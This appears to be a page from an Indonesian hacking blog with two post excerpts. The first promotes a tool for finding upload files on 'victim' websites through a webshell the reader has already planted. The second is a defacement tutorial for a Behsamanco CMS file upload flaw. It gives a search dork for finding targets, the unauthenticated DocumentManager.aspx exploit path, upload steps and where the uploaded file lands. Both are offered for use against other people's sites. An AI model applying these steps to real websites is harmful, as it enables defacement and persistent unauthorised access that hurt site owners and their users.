Skip to main content

Posts

Showing posts with the label Behsamanco Cms

Cara Mencari file Uploader di Website

*nb: Diperuntukan buat yang sudah Menanam WebShell di web korban Hello World ; Pagii Fans, Please Say Hello Haters :* xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs. kali ini Nue bakal Share tools keren buatan Bang Tu5b0l3d .  ini cocok banget buat yg pengen menemukan bug baru di plugins atau themes wordpress atau joomla dan CMS Lainnya. bukan menemukan bug baru sih, tapi menemukan file yang ada kata - kata uploadnya melalui shell.  tool ini juga bisa dijalananin di OS apa aja : Windows, Linux, Other. ya daripada kita buka satu - satu dir untuk nyari file upload. mending pakai tool ini. Lanjut Simak Cara Mencari file Uploader di Website Lanjut intip Tutorial ;* ada 2 file yang dipakai disini. search.php http://pastebin.com/G1vnLbUt |  Drive Google index.php http://pastebin.com/nenExAFA |  Drive Google *silahkan edit2 dikit lalu masukan url web korban file search.php langsung diupload aja ke websitenya. Upload melalui WebShell yg udh lu tanem di we...

Deface dengan Behsamanco Cms File Upload Vulnerability

Hallo Fans, Nuenomaru disini .-. Setelah kemarin Om OepilCore Share tentang artikel  Trik Login Wifi.ID tanpa Harus Masukan ACCOUNT   . kali ini Nue akan share Tutorial Exploit  Behsamanco Cms File Upload Vulnerability etthoo,,  ini exploit gak begitu baru  loh .. *exploit lama wkwk hahaha iseng2 aja share kali aja masih  crotz    *yang dah expert minggir dlu beb :* Langsung intip Tutorialnya :* Dork : inurl:Repositary/RadEditor/SentDoc/Guest/ 1. searching dork menggunakan search engine Nue pilih satu web. *Liat Gans aned kan mukanya 2. Masukin deh Exploit nya di belakang web target . Exploit: /Pages/Admin/CKEditor/DocumentManager.aspx contoh: target.co.li//Pages/Admin/CKEditor/DocumentManager.aspx 3. Habis itu klik tombol yang berfungsi untuk upload, cari deh file yang pegen agan upload >,< 4. File Sukses terupload 5. Letak File: target.co.li/Repositary/RadEditor/SentDoc/Guest/filename.txt Done Deskripsi: This vulenarabity allows ...